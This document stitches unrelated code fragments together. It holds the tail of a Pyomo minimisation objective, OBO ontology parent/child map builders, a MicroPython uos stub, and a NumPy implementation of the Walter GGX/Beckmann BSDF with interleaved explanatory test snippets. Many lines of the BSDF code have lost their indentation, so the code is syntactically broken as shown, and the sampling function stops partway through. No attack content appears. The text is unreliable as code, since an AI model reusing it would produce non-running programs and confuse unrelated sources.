0.00925749471717982*m.x1083 + 0.00925749471717982*m.x1084 + 0.00925749471717982*m.x1085 +
0.00925749471717982*m.x1086 + 0.00925749471717982*m.x1087 + 0.00925749471717982*m.x1088 +
0.00925749471717982*m.x1089 + 0.00925749471717982*m.x1090 + 0.00925749471717982*m.x1091 +
0.00925749471717982*m.x1092 + 0.00925749471717982*m.x1093 + 0.00925749471717982*m.x1094 +
0.00925749471717982*m.x1095 + 0.00925749471717982*m.x1096 + 0.00925749471717982*m.x1097 +
0.00925749471717982*m.x1098 + 0.00925749471717982*m.x1099 + 0.00925749471717982*m.x1100 +
0.00925749471717982*m.x1101 + 0.00925749471717982*m.x1102 + 0.00925749471717982*m.x1103 +
0.00925749471717982*m.x1104 + 0.00925749471717982*m.x1105 + 0.00925749471717982*m.x1106 +
0.00925749471717982*m.x1107 + 0.00893818112378762*m.x1108 + 0.00893818112378762*m.x1109 +
0.00893818112378762*m.x1110 + 0.00893818112378762*m.x1111 + 0.00893818112378762*m.x1112 +
0.00893818112378762*m.x1113 + 0.00893818112378762*m.x1114 + 0.00893818112378762*m.x1115 +
0.00893818112378762*m.x1116 + 0.00893818112378762*m.x1117 + 0.00893818112378762*m.x1118 +
0.00893818112378762*m.x1119 + 0.00893818112378762*m.x1120 + 0.00893818112378762*m.x1121 +
0.00893818112378762*m.x1122 + 0.00893818112378762*m.x1123 + 0.00893818112378762*m.x1124 +
0.00893818112378762*m.x1125 + 0.00893818112378762*m.x1126 + 0.00893818112378762*m.x1127 +
0.00893818112378762*m.x1128 + 0.00893818112378762*m.x1129 + 0.00893818112378762*m.x1130 +
0.00893818112378762*m.x1131 + 0.00893818112378762*m.x1132 + 0.00893818112378762*m.x1133 +
0.00893818112378762*m.x1134 + 0.00848337381563895*m.x1135 + 0.00848337381563895*m.x1136 +
0.00848337381563895*m.x1137 + 0.00848337381563895*m.x1138 + 0.00848337381563895*m.x1139 +
0.00848337381563895*m.x1140 + 0.00848337381563895*m.x1141 + 0.00848337381563895*m.x1142 +
0.00848337381563895*m.x1143 + 0.00848337381563895*m.x1144 + 0.00848337381563895*m.x1145 +
0.00848337381563895*m.x1146 + 0.00848337381563895*m.x1147 + 0.00848337381563895*m.x1148 +
0.00848337381563895*m.x1149 + 0.00848337381563895*m.x1150 + 0.00848337381563895*m.x1151 +
0.00848337381563895*m.x1152 + 0.00848337381563895*m.x1153 + 0.00848337381563895*m.x1154 +
0.00848337381563895*m.x1155 + 0.00848337381563895*m.x1156 + 0.00848337381563895*m.x1157 +
0.00848337381563895*m.x1158 + 0.00848337381563895*m.x1159 + 0.00848337381563895*m.x1160 +
0.00848337381563895*m.x1161 + 0.00789996720792031*m.x1162 + 0.00789996720792031*m.x1163 +
0.00789996720792031*m.x1164 + 0.00789996720792031*m.x1165 + 0.00789996720792031*m.x1166 +
0.00789996720792031*m.x1167 + 0.00789996720792031*m.x1168 + 0.00789996720792031*m.x1169 +
0.00789996720792031*m.x1170 + 0.00789996720792031*m.x1171 + 0.00789996720792031*m.x1172 +
0.00789996720792031*m.x1173 + 0.00789996720792031*m.x1174 + 0.00789996720792031*m.x1175 +
0.00789996720792031*m.x1176 + 0.00789996720792031*m.x1177 + 0.00789996720792031*m.x1178 +
0.00789996720792031*m.x1179 + 0.00789996720792031*m.x1180 + 0.00789996720792031*m.x1181 +
0.00789996720792031*m.x1182 + 0.00789996720792031*m.x1183 + 0.00789996720792031*m.x1184 +
0.00789996720792031*m.x1185 + 0.00789996720792031*m.x1186 + 0.00789996720792031*m.x1187 +
0.00789996720792031*m.x1188 + 0.00719680515011276*m.x1189 + 0.00719680515011276*m.x1190 +
0.00719680515011276*m.x1191 + 0.00719680515011276*m.x1192 + 0.00719680515011276*m.x1193 +
0.00719680515011276*m.x1194 + 0.00719680515011276*m.x1195 + 0.00719680515011276*m.x1196 +
0.00719680515011276*m.x1197 + 0.00719680515011276*m.x1198 + 0.00719680515011276*m.x1199 +
0.00719680515011276*m.x1200 + 0.00719680515011276*m.x1201 + 0.00719680515011276*m.x1202 +
0.00719680515011276*m.x1203 + 0.00719680515011276*m.x1204 + 0.00719680515011276*m.x1205 +
0.00719680515011276*m.x1206 + 0.00719680515011276*m.x1207 + 0.00719680515011276*m.x1208 +
0.00719680515011276*m.x1209 + 0.00719680515011276*m.x1210 + 0.00719680515011276*m.x1211 +
0.00719680515011276*m.x1212 + 0.00719680515011276*m.x1213 + 0.00719680515011276*m.x1214 +
0.00719680515011276*m.x1215 + 0.00638454686224871*m.x1216 + 0.00638454686224871*m.x1217 +
0.00638454686224871*m.x1218 + 0.00638454686224871*m.x1219 + 0.00638454686224871*m.x1220 +
0.00638454686224871*m.x1221 + 0.00638454686224871*m.x1222 + 0.00638454686224871*m.x1223 +
0.00638454686224871*m.x1224 + 0.00638454686224871*m.x1225 + 0.00638454686224871*m.x1226 +
0.00638454686224871*m.x1227 + 0.00638454686224871*m.x1228 + 0.00638454686224871*m.x1229 +
0.00638454686224871*m.x1230 + 0.00638454686224871*m.x1231 + 0.00638454686224871*m.x1232 +
0.00638454686224871*m.x1233 + 0.00638454686224871*m.x1234 + 0.00638454686224871*m.x1235 +
0.00638454686224871*m.x1236 + 0.00638454686224871*m.x1237 + 0.00638454686224871*m.x1238 +
0.00638454686224871*m.x1239 + 0.00638454686224871*m.x1240 + 0.00638454686224871*m.x1241 +
0.00638454686224871*m.x1242 + 0.0054755053520017*m.x1243 + 0.0054755053520017*m.x1244 +
0.0054755053520017*m.x1245 + 0.0054755053520017*m.x1246 + 0.0054755053520017*m.x1247 +
0.0054755053520017*m.x1248 + 0.0054755053520017*m.x1249 + 0.0054755053520017*m.x1250 +
0.0054755053520017*m.x1251 + 0.0054755053520017*m.x1252 + 0.0054755053520017*m.x1253 +
0.0054755053520017*m.x1254 + 0.0054755053520017*m.x1255 + 0.0054755053520017*m.x1256 +
0.0054755053520017*m.x1257 + 0.0054755053520017*m.x1258 + 0.0054755053520017*m.x1259 +
0.0054755053520017*m.x1260 + 0.0054755053520017*m.x1261 + 0.0054755053520017*m.x1262 +
0.0054755053520017*m.x1263 + 0.0054755053520017*m.x1264 + 0.0054755053520017*m.x1265 +
0.0054755053520017*m.x1266 + 0.0054755053520017*m.x1267 + 0.0054755053520017*m.x1268 +
0.0054755053520017*m.x1269 + 0.00448346076204115*m.x1270 + 0.00448346076204115*m.x1271 +
0.00448346076204115*m.x1272 + 0.00448346076204115*m.x1273 + 0.00448346076204115*m.x1274 +
0.00448346076204115*m.x1275 + 0.00448346076204115*m.x1276 + 0.00448346076204115*m.x1277 +
0.00448346076204115*m.x1278 + 0.00448346076204115*m.x1279 + 0.00448346076204115*m.x1280 +
0.00448346076204115*m.x1281 + 0.00448346076204115*m.x1282 + 0.00448346076204115*m.x1283 +
0.00448346076204115*m.x1284 + 0.00448346076204115*m.x1285 + 0.00448346076204115*m.x1286 +
0.00448346076204115*m.x1287 + 0.00448346076204115*m.x1288 + 0.00448346076204115*m.x1289 +
0.00448346076204115*m.x1290 + 0.00448346076204115*m.x1291 + 0.00448346076204115*m.x1292 +
0.00448346076204115*m.x1293 + 0.00448346076204115*m.x1294 + 0.00448346076204115*m.x1295 +
0.00448346076204115*m.x1296 + 0.00342345147711632*m.x1297 + 0.00342345147711632*m.x1298 +
0.00342345147711632*m.x1299 + 0.00342345147711632*m.x1300 + 0.00342345147711632*m.x1301 +
0.00342345147711632*m.x1302 + 0.00342345147711632*m.x1303 + 0.00342345147711632*m.x1304 +
0.00342345147711632*m.x1305 + 0.00342345147711632*m.x1306 + 0.00342345147711632*m.x1307 +
0.00342345147711632*m.x1308 + 0.00342345147711632*m.x1309 + 0.00342345147711632*m.x1310 +
0.00342345147711632*m.x1311 + 0.00342345147711632*m.x1312 + 0.00342345147711632*m.x1313 +
0.00342345147711632*m.x1314 + 0.00342345147711632*m.x1315 + 0.00342345147711632*m.x1316 +
0.00342345147711632*m.x1317 + 0.00342345147711632*m.x1318 + 0.00342345147711632*m.x1319 +
0.00342345147711632*m.x1320 + 0.00342345147711632*m.x1321 + 0.00342345147711632*m.x1322 +
0.00342345147711632*m.x1323 + 0.00231154615747269*m.x1324 + 0.00231154615747269*m.x1325 +
0.00231154615747269*m.x1326 + 0.00231154615747269*m.x1327 + 0.00231154615747269*m.x1328 +
0.00231154615747269*m.x1329 + 0.00231154615747269*m.x1330 + 0.00231154615747269*m.x1331 +
0.00231154615747269*m.x1332 + 0.00231154615747269*m.x1333 + 0.00231154615747269*m.x1334 +
0.00231154615747269*m.x1335 + 0.00231154615747269*m.x1336 + 0.00231154615747269*m.x1337 +
0.00231154615747269*m.x1338 + 0.00231154615747269*m.x1339 + 0.00231154615747269*m.x1340 +
0.00231154615747269*m.x1341 + 0.00231154615747269*m.x1342 + 0.00231154615747269*m.x1343 +
0.00231154615747269*m.x1344 + 0.00231154615747269*m.x1345 + 0.00231154615747269*m.x1346 +
0.00231154615747269*m.x1347 + 0.00231154615747269*m.x1348 + 0.00231154615747269*m.x1349 +
0.00231154615747269*m.x1350 + 0.00116460015434218*m.x1351 + 0.00116460015434218*m.x1352 +
0.00116460015434218*m.x1353 + 0.00116460015434218*m.x1354 + 0.00116460015434218*m.x1355 +
0.00116460015434218*m.x1356 + 0.00116460015434218*m.x1357 + 0.00116460015434218*m.x1358 +
0.00116460015434218*m.x1359 + 0.00116460015434218*m.x1360 + 0.00116460015434218*m.x1361 +
0.00116460015434218*m.x1362 + 0.00116460015434218*m.x1363 + 0.00116460015434218*m.x1364 +
0.00116460015434218*m.x1365 + 0.00116460015434218*m.x1366 + 0.00116460015434218*m.x1367 +
0.00116460015434218*m.x1368 + 0.00116460015434218*m.x1369 + 0.00116460015434218*m.x1370 +
0.00116460015434218*m.x1371 + 0.00116460015434218*m.x1372 + 0.00116460015434218*m.x1373 +
0.00116460015434218*m.x1374 + 0.00116460015434218*m.x1375 + 0.00116460015434218*m.x1376 +
0.00116460015434218*m.x1377 - 1.3235376744968e-16*m.x1378 - 1.3235376744968e-16*m.x1379 -
1.3235376744968e-16*m.x1380 - 1.3235376744968e-16*m.x1381 - 1.3235376744968e-16*m.x1382 -
1.3235376744968e-16*m.x1383 - 1.3235376744968e-16*m.x1384 - 1.3235376744968e-16*m.x1385 -
1.3235376744968e-16*m.x1386 - 1.3235376744968e-16*m.x1387 - 1.3235376744968e-16*m.x1388 -
1.3235376744968e-16*m.x1389 - 1.3235376744968e-16*m.x1390 - 1.3235376744968e-16*m.x1391 -
1.3235376744968e-16*m.x1392 - 1.3235376744968e-16*m.x1393 - 1.3235376744968e-16*m.x1394 -
1.3235376744968e-16*m.x1395 - 1.3235376744968e-16*m.x1396 - 1.3235376744968e-16*m.x1397 -
1.3235376744968e-16*m.x1398 - 1.3235376744968e-16*m.x1399 - 1.3235376744968e-16*m.x1400 -
1.3235376744968e-16*m.x1401 - 1.3235376744968e-16*m.x1402 - 1.3235376744968e-16*m.x1403 -
1.3235376744968e-16*m.x1404, sense=minimize)
# tools/intogen/runtime/pyenv/lib/python2.7/site-packages/bgcore/obo/tree.py
# (globusgenomics/galaxy, CC-BY-3.0)
def ascendant(ontology, rel="is_a"):
    """Map each term id to the list of its direct parents via `rel`."""
    asc_tree = {}
    for term in ontology.get_stanzas("term"):
        term_id = term.get_id()
        if term.contains_tag(rel):
            for isa in term.get_tag(rel):
                asc_tree.setdefault(term_id, []).append(isa.content)
    return asc_tree

def descendant(ontology, rel="is_a"):
    """Map each parent term id to the list of its direct children via `rel`."""
    des_tree = {}
    for term in ontology.get_stanzas("term"):
        term_id = term.get_id()
        if term.contains_tag(rel):
            for isa in term.get_tag(rel):
                des_tree.setdefault(isa.content, []).append(term_id)
    return des_tree

def all(ontology, rel="is_a"):
    """Build both the ascendant and descendant maps in a single pass.

    Note: the name shadows the builtin `all` if star-imported.
    """
    asc_tree = {}
    des_tree = {}
    for term in ontology.get_stanzas("term"):
        term_id = term.get_id()
        if term.contains_tag(rel):
            for isa in term.get_tag(rel):
                parent = isa.content
                asc_tree.setdefault(term_id, []).append(parent)
                des_tree.setdefault(parent, []).append(term_id)
    return (asc_tree, des_tree)
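The three builders above share the same traversal; a small smoke test makes the output shapes concrete. The `_Term`/`_Tag`/`_Ontology` classes below are hypothetical stand-ins for the bgcore OBO stanza API (only `get_stanzas`, `get_id`, `contains_tag`, and `get_tag` are mocked), and the `ascendant` logic is repeated so the snippet runs standalone.

```python
# Hypothetical stand-ins for the bgcore OBO stanza API, for illustration only.
class _Tag:
    def __init__(self, content):
        self.content = content

class _Term:
    def __init__(self, term_id, parents):
        self._id, self._parents = term_id, parents
    def get_id(self):
        return self._id
    def contains_tag(self, rel):
        return bool(self._parents)
    def get_tag(self, rel):
        return [_Tag(p) for p in self._parents]

class _Ontology:
    def __init__(self, terms):
        self._terms = terms
    def get_stanzas(self, kind):
        return self._terms

def ascendant(ontology, rel="is_a"):
    # Same logic as above, repeated so this example is self-contained.
    asc_tree = {}
    for term in ontology.get_stanzas("term"):
        term_id = term.get_id()
        if term.contains_tag(rel):
            for isa in term.get_tag(rel):
                asc_tree.setdefault(term_id, []).append(isa.content)
    return asc_tree

onto = _Ontology([_Term("GO:B", ["GO:A"]), _Term("GO:C", ["GO:A", "GO:B"])])
asc = ascendant(onto)   # {'GO:B': ['GO:A'], 'GO:C': ['GO:A', 'GO:B']}
```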
# mp-tests/stubs/uos.py (markpatterson27/Project-Hand-Sanitiser-Level-Monitor, MIT)
def uname():
    return ('test',)

# walter.py (xiamengqi2012/RealNVPBRDF, MIT)
import numpy as np
# Walter BSDF evaluation and sampling.
# Implementation ported from RIS walterbxdf.h and support files
# All these functions work for arrays.
# indexing expression to add a singleton dimension at the end
nax = (..., np.newaxis)
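As a quick illustration of the `nax` idiom: indexing with `(..., np.newaxis)` appends a trailing singleton axis, which lets a per-sample scalar broadcast against per-sample 3-vectors.

```python
import numpy as np

nax = (..., np.newaxis)

scal = np.full((2, 3), 2.0)     # per-sample scalars, shape (2, 3)
vecs = np.ones((2, 3, 3))       # per-sample 3-vectors, shape (2, 3, 3)
out = scal[nax] * vecs          # scal[nax] has shape (2, 3, 1) and broadcasts
```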
def SQRT(x): return np.sqrt(x)
def MAX(a,b): return np.maximum(a, b)
def SINCOS(t): return (np.sin(t), np.cos(t))
def ABS(x): return np.abs(x)
def SIGN(x): return np.sign(x)
def makeRtVector3(x, y, z):
return np.stack((x, y, z), -1)
def makeRtColorRGB(c):
return np.stack((c, c, c), -1)
def Dot(u, v):
return (u * v).sum(-1)
def Max(u):
return np.amax(u, -1)
def Normalize(u):
return u / np.sqrt(Dot(u, u))[...,np.newaxis]
def SphericalDirection( sintheta, costheta, phi ):
    sinphi, cosphi = SINCOS( phi )
return makeRtVector3( sintheta * cosphi, sintheta * sinphi, costheta )
def ReflectedVector( V, H, VdotH ):
return 2.0 * VdotH[...,np.newaxis] * H - V
def RefractedVector( V, H, VdotH, VdotN, eta ):
# eta is a scalar
ieta = 1.0 / eta
coef = VdotH * ieta - SIGN( VdotN ) * SQRT( 1.0 + ( VdotH*VdotH-1.0 ) * ( ieta*ieta ) )
res = coef[...,np.newaxis] * H - V*ieta
    # Normalize returns a new array (it does not mutate), so its result
    # must be returned, not discarded.
    return Normalize( res )
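A sanity check on the refraction formula above, in the simplest geometry where H coincides with the shading normal: the transmitted direction must obey Snell's law and point into the opposite hemisphere. The helper below is a standalone single-vector copy of `RefractedVector` (here `eta` plays the role of the far-side/near-side index ratio when V is on the +z side).

```python
import numpy as np

def refracted_dir(V, H, eta):
    # Single-vector copy of RefractedVector above.
    VdotH = float(np.dot(V, H))
    ieta = 1.0 / eta
    coef = VdotH * ieta - np.sign(V[2]) * np.sqrt(1.0 + (VdotH * VdotH - 1.0) * ieta * ieta)
    res = coef * H - V * ieta
    return res / np.linalg.norm(res)

eta = 1.5
theta_i = np.deg2rad(30.0)
V = np.array([np.sin(theta_i), 0.0, np.cos(theta_i)])   # viewer on the +z side
H = np.array([0.0, 0.0, 1.0])                           # half vector = normal
T = refracted_dir(V, H, eta)
sin_t = np.hypot(T[0], T[1])                            # sin(theta_t)
# Snell's law: sin(theta_i) = eta * sin(theta_t), with T below the surface (T[2] < 0)
```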
def fresnel(n_i, n_t, mu_i):
lm_t2 = (n_i / n_t)**2 * (1 - mu_i**2)
mu_t = np.sqrt(1 - np.minimum(lm_t2, 1))
R_s = ((n_i * mu_i - n_t * mu_t) / (n_i * mu_i + n_t * mu_t))**2
R_p = ((n_i * mu_t - n_t * mu_i) / (n_i * mu_t + n_t * mu_i))**2
return np.select([mu_i > 0], [(R_s + R_p) / 2], 1.0)
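Two limiting cases pin down the conventions of `fresnel` (the definition is repeated so this snippet runs standalone): at normal incidence from air into glass it reduces to ((n_i - n_t)/(n_i + n_t))^2 = 0.04, and past the critical angle on the dense side it saturates to total internal reflection.

```python
import numpy as np

def fresnel(n_i, n_t, mu_i):
    # Unpolarized Fresnel average, identical to the definition above.
    lm_t2 = (n_i / n_t)**2 * (1 - mu_i**2)
    mu_t = np.sqrt(1 - np.minimum(lm_t2, 1))
    R_s = ((n_i * mu_i - n_t * mu_t) / (n_i * mu_i + n_t * mu_t))**2
    R_p = ((n_i * mu_t - n_t * mu_i) / (n_i * mu_t + n_t * mu_i))**2
    return np.select([mu_i > 0], [(R_s + R_p) / 2], 1.0)

R0 = fresnel(1.0, 1.5, np.array([1.0]))     # normal incidence, air -> glass: 0.04
R_tir = fresnel(1.5, 1.0, np.array([0.5]))  # 60 deg inside glass, past critical angle: 1.0
```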
def Fresnel( VdotH, eta ):
return fresnel(1.0, eta, VdotH)
def chi_plus(x):
return np.where(x > 0, 1, 0)
def sampleH(roughness2, xi0, xi1, dist):
if dist == 'G':
# GGX
# Sample angle theta: eq 35
tantheta2 = roughness2 * xi0 / ( 1.0 - xi0 )
costheta2 = 1.0 / ( 1.0 + tantheta2 )
costheta = SQRT( costheta2 )
sintheta = SQRT( MAX( 0.0, 1.0 - costheta2 ) )
elif dist == 'B':
# Beckmann
# sample angle theta: eq 28
tantheta2 = -roughness2 * np.log(1-xi0)
costheta2 = 1.0 / ( 1.0 + tantheta2 )
costheta = SQRT( costheta2 )
sintheta = SQRT( MAX( 0.0, 1.0 - costheta2 ) )
else:
raise ValueError('dist is neither G nor B')
return (SphericalDirection( sintheta, costheta, 2 * np.pi * xi1 ), costheta)
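The GGX branch of `sampleH` is an inverse-CDF transform: tan²θ = α²ξ/(1−ξ), so ξ = 0.5 maps to tan²θ = α² and the sample median of tan²θ should land near α². The check below replays that branch standalone and also confirms the spherical construction yields unit vectors.

```python
import numpy as np

rng = np.random.default_rng(0)
alpha2 = 0.09                                   # roughness squared
n = 200_000
xi0, xi1 = rng.random(n), rng.random(n)

# GGX inverse-CDF sampling of the half-vector angle (eq. 35), as in sampleH.
tantheta2 = alpha2 * xi0 / (1.0 - xi0)
costheta = np.sqrt(1.0 / (1.0 + tantheta2))
sintheta = np.sqrt(np.maximum(0.0, 1.0 - costheta**2))
phi = 2.0 * np.pi * xi1
H = np.stack((sintheta * np.cos(phi), sintheta * np.sin(phi), costheta), -1)

unit_err = np.abs(np.linalg.norm(H, axis=-1) - 1.0).max()
median_rel_err = abs(np.median(tantheta2) - alpha2) / alpha2
```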
def BeckmannG1(value, a):
return chi_plus(value) * (3.535*a + 2.181*a*a)/(1 + 2.276*a + 2.577*a*a)
def BeckmannG2(value):
return chi_plus(value)
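`BeckmannG1` is the rational fit from Walter et al. (eq. 27, used on the `a < 1.6` branch); it can be compared against the exact Smith G1 for the Beckmann distribution, which only needs `math.erf`. The exact form below is written via the Smith Λ function; the comparison range is illustrative.

```python
import math

def beckmann_g1_rational(a):
    # Rational fit used above (valid branch: a < 1.6).
    return (3.535 * a + 2.181 * a * a) / (1.0 + 2.276 * a + 2.577 * a * a)

def beckmann_g1_exact(a):
    # Exact Smith G1 for Beckmann via the Lambda function:
    # Lambda(a) = (erf(a) - 1)/2 + exp(-a^2) / (2 a sqrt(pi)),  G1 = 1 / (1 + Lambda)
    lam = (math.erf(a) - 1.0) / 2.0 + math.exp(-a * a) / (2.0 * a * math.sqrt(math.pi))
    return 1.0 / (1.0 + lam)

# Worst absolute deviation of the fit over a in [0.05, 1.6].
worst = max(abs(beckmann_g1_rational(a) - beckmann_g1_exact(a))
            for a in [0.05 + 0.05 * k for k in range(32)])
```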
def evaluate(roughness, eta, wo, wi, dist):
    # Returns the BRDF value (the cosine factor is not included).
    """Evaluate BRDF and PDFs for Walter BxDF."""
# eta is assumed > 1, and it is the refractive index of the side of the
# surface facing away from the normal.
rGain = 1.0
boostReflect = 1.0
tAlbedo = np.array((1.0, 1.0, 1.0))
# Convention is for forward path tracing; "i" is the viewer and "o" is the light.
VdotN = wi[...,2]
LdotN = wo[...,2]
isRefraction = ( LdotN*VdotN < 0.0 )
# Refractive indices for the two sides. eta_o is the index for the side
# opposite wi, even when wo is on the same side.
eta_i = np.where(VdotN > 0, 1.0, eta)
eta_o = np.where(VdotN > 0, eta, 1.0)
# Half vector.
H = np.where(isRefraction[nax],
-(eta_o[nax] * wo + eta_i[nax] * wi),
SIGN(VdotN)[nax] * (wo + wi))
H = Normalize( H )
    # Side-consistency flag for H (currently unused).
    correct = H[...,2] * wi[...,2] > 0
VdotH = Dot( wi, H )
absVdotH = ABS( VdotH )
LdotH = Dot( wo, H )
absLdotH = ABS( LdotH )
# This seems always to compute Fresnel factor for the ray coming from outside.
#F = Fresnel( absVdotH, eta )
# Compute fresnel factor for the appropriate side of the surface.
F = fresnel(eta_i, eta_o, absVdotH)
chooseReflect = F * rGain * boostReflect
chooseRefract = (1.0-F) * Max( tAlbedo )
total = chooseRefract + chooseReflect
chooseReflect = chooseReflect / total
chooseRefract = 1.0 - chooseReflect
roughness2 = roughness*roughness
HdotN = H[...,2]
costheta = ABS( HdotN )
costheta2 = costheta * costheta
if dist == 'G':
# Compute the microfacet distribution (GGX): eq 33
alpha2_tantheta2 = roughness2 + ( 1.0 - costheta2 ) / costheta2
D = chi_plus(HdotN) * roughness2 / np.pi / ( costheta2*costheta2 * alpha2_tantheta2*alpha2_tantheta2 )
# Compute the Smith shadowing terms: eq 34 and eq 23
LdotN2 = LdotN * LdotN
VdotN2 = VdotN * VdotN
iG1o = 1.0 + SQRT( 1.0 + roughness2 * ( 1.0 - LdotN2 ) / LdotN2 )
iG1i = 1.0 + SQRT( 1.0 + roughness2 * ( 1.0 - VdotN2 ) / VdotN2 )
G = chi_plus(VdotH/VdotN) * chi_plus(LdotH/LdotN) * 4.0 / ( iG1o * iG1i )
elif dist == 'B':
# Beckmann distribution and shadowing masking term
# Compute the Beckmann Distribution: eq 25
tantheta2 = ( 1.0 - costheta2 ) / costheta2
        D = chi_plus(HdotN)/(np.pi * roughness2 * costheta2 * costheta2) * np.exp(-tantheta2/roughness2)
# Shadowing masking term for Beckmann: eq 27
costhetav = ABS(VdotN)
tanthetav = SQRT(1 - costhetav*costhetav)/costhetav
a = 1.0/(roughness * tanthetav)
iG1i = np.where(a<1.6, BeckmannG1(VdotH/VdotN, a), BeckmannG2(VdotH/VdotN))
costhetal = ABS(LdotN)
tanthetal = SQRT(1 - costhetal*costhetal)/costhetal
a = 1.0/(roughness * tanthetal)
iG1o = np.where(a<1.6, BeckmannG1(LdotH/LdotN, a), BeckmannG2(LdotH/LdotN))
G = iG1i * iG1o
else:
raise ValueError('dist is neither G nor B')
# Final BRDF value and PDF: eq 41
# Refraction case
denom = ( VdotH + (eta_o/eta_i) * LdotH)**2
idenom = 1.0 / denom
fJacobian = absLdotH * idenom
rJacobian = absVdotH * idenom
# refract_value = tAlbedo * ( (1.0-F) * D * G * absVdotH * fJacobian * (eta_o/eta_i)**2 / ABS( VdotN ) )[...,np.newaxis] # baking LdotN
refract_value = tAlbedo * ( (1.0-F) * D * G * absVdotH * fJacobian * (eta_o/eta_i)**2 / (ABS( VdotN ) *ABS( LdotN )))[...,np.newaxis] # not baking LdotN
refract_fpdf = chi_plus(VdotH/VdotN) * chi_plus(LdotH/LdotN) * chooseRefract * D*costheta * fJacobian * (eta_o/eta_i)**2
refract_rpdf = chi_plus(VdotH/VdotN) * chi_plus(LdotH/LdotN) * chooseRefract * D*costheta * rJacobian
# Reflection case
jacobian = 1.0 / ( 4.0 * absLdotH ) # LdotH = VdotH by definition
# reflect_value = makeRtColorRGB( rGain * F * D * G / ( 4.0 * ABS( VdotN ) ) ) # baking LdotN
reflect_value = makeRtColorRGB( rGain * F * D * G / ( 4.0 * ABS( VdotN ) * ABS( LdotN )) ) # no baking LdotN
reflect_fpdf = chi_plus(VdotH/VdotN) * chi_plus(LdotH/LdotN) * chooseReflect * D*costheta * jacobian
reflect_rpdf = chi_plus(VdotH/VdotN) * chi_plus(LdotH/LdotN) * chooseReflect * D*costheta * jacobian
value = np.where(isRefraction[...,np.newaxis], refract_value, reflect_value)
fpdf = np.where(isRefraction, refract_fpdf, reflect_fpdf)
rpdf = np.where(isRefraction, refract_rpdf, reflect_rpdf)
return (value, fpdf, rpdf )
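The GGX normal distribution used in `evaluate` (eq. 33) should integrate to one against the projected solid angle, ∫ D(h) cosθ dω = 1; a midpoint-rule quadrature over the hemisphere confirms this. The denominator is rewritten using cos⁴θ (α² + tan²θ)² = (cos²θ (α² − 1) + 1)², an algebraically equivalent form that avoids the tangent.

```python
import numpy as np

alpha = 0.3
a2 = alpha * alpha
n = 200_000
theta = (np.arange(n) + 0.5) * (np.pi / 2) / n        # midpoint rule on [0, pi/2]
ct, st = np.cos(theta), np.sin(theta)
ct2 = ct * ct

# GGX NDF, eq. 33: D = a2 / (pi * cos^4(theta) * (a2 + tan^2(theta))^2)
D = a2 / (np.pi * (ct2 * (a2 - 1.0) + 1.0)**2)

# Integrate D * cos(theta) over the hemisphere (the 2*pi comes from the azimuth).
integral = 2.0 * np.pi * np.sum(D * ct * st) * (np.pi / 2) / n
```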
def sample(xi0, xi1, xi2, roughness, eta, wi, dist):
"""Generate a sample from the Walter BxDF by sampling normal distribution."""
""" TODO: Implement sampling according to visible normal"""
rGain = 1.0
boostReflect = 1.0
tAlbedo = np.array((1.0, 1.0, 1.0))
roughness2 = roughness * roughness
(H, costheta) = sampleH(roughness2, xi0, xi1, dist)
VdotH = Dot( wi, H )
absVdotH = ABS( VdotH )
VdotN = wi[...,2]
eta_i = np.where(VdotN > 0, 1.0, eta)
eta_o = np.where(VdotN > 0, eta, 1.0)
F = fresnel(eta_i, eta_o, absVdotH)
    chooseReflect = F * rGain * boostReflect
    chooseRefract = (1.0-F) * Max( tAlbedo )
    total = chooseRefract + chooseReflect
    chooseReflect = chooseReflect / total
    chooseRefract = 1.0 - chooseReflect
# choose reflection or refraction
doRefraction = (xi2 >= chooseReflect)
    # NOTE: uses VdotN[0] only, so all samples in the batch are assumed to
    # lie on the same side of the surface.
    if VdotN[0] > 0:
        e = eta
    else:
        e = 1/eta
wo = np.where(doRefraction[...,np.newaxis],
RefractedVector( wi, H, VdotH, VdotN, e ),
ReflectedVector( wi, H, VdotH )
)
HdotN = H[...,2]
LdotN = wo[...,2]
LdotH = Dot( wo, H )
absLdotH = ABS( LdotH )
if dist == 'G':
# Compute the microfacet distribution (GGX): eq 33
tantheta2 = roughness2 * xi0 / ( 1.0 - xi0 )
costheta2 = 1.0 / ( 1.0 + tantheta2 )
alpha2_tantheta2 = roughness2 + tantheta2
D = chi_plus(HdotN) * roughness2 / np.pi / ( costheta2*costheta2 * alpha2_tantheta2*alpha2_tantheta2 )
# Compute the Smith shadowing terms: eq 34 and eq 23
LdotN = wo[...,2]
LdotN2 = LdotN * LdotN
VdotN2 = VdotN * VdotN
iG1o = 1.0 + SQRT( 1.0 + roughness2 * ( 1.0 - LdotN2 ) / LdotN2 )
iG1i = 1.0 + SQRT( 1.0 + roughness2 * ( 1.0 - VdotN2 ) / VdotN2 )
LdotH = Dot( wo, H )
LdotN = wo[...,2]
G = chi_plus(VdotH/VdotN) * chi_plus(LdotH/LdotN) * 4.0/( iG1o * iG1i )
elif dist == 'B':
# Beckmann distribution and shadowing masking term
# Compute the Beckmann Distribution: eq 25
costh = ABS(HdotN)
costh2 = costh**2
tanth2 = ( 1.0 - costh2 ) / costh2
        D = chi_plus(HdotN)/(np.pi * roughness2 * costh2 * costh2) * np.exp(-tanth2/roughness2)
# Shadowing masking term for Beckmann: eq 27
costhetav = ABS(VdotN)
tanthetav = SQRT(1 - costhetav*costhetav)/costhetav
a = 1.0/(roughness * tanthetav)
iG1i = np.where(a<1.6, BeckmannG1(VdotH/VdotN, a), BeckmannG2(VdotH/VdotN))
costhetal = ABS(LdotN)
tanthetal = SQRT(1 - costhetal*costhetal)/costhetal
a = 1.0/(roughness * tanthetal)
iG1o = np.where(a<1.6, BeckmannG1(LdotH/LdotN, a), BeckmannG2(LdotH/LdotN))
G = iG1i * iG1o
else:
raise ValueError('dist is neither G nor B')
# Final BRDF value and PDF: eq 41
# Refraction case
denom = (VdotH + eta_o/eta_i * LdotH)**2
idenom = 1.0 / denom
fJacobian = absLdotH * idenom
rJacobian = absVdotH * idenom
# side check
    correct_refract = wi[...,2] * wo[...,2] < 0
refract_value = np.where(correct_refract[nax], tAlbedo * ( (1.0-F) * D * G * absVdotH * fJacobian * (eta_o/eta_i)**2 / (ABS( VdotN ) *ABS( LdotN )))[nax], makeRtColorRGB(0.0)) # not baking LdotN
refract_fpdf = np.where(correct_refract, chooseRefract * D * costheta * fJacobian * (eta_o/eta_i)**2, 0)
refract_rpdf = np.where(correct_refract, chooseRefract * D * costheta * rJacobian, 0)
# Reflection case
jacobian = 1.0 / ( 4.0 * absLdotH ) # LdotH = VdotH by definition
# side check
    correct_reflect = wi[...,2] * wo[...,2] > 0
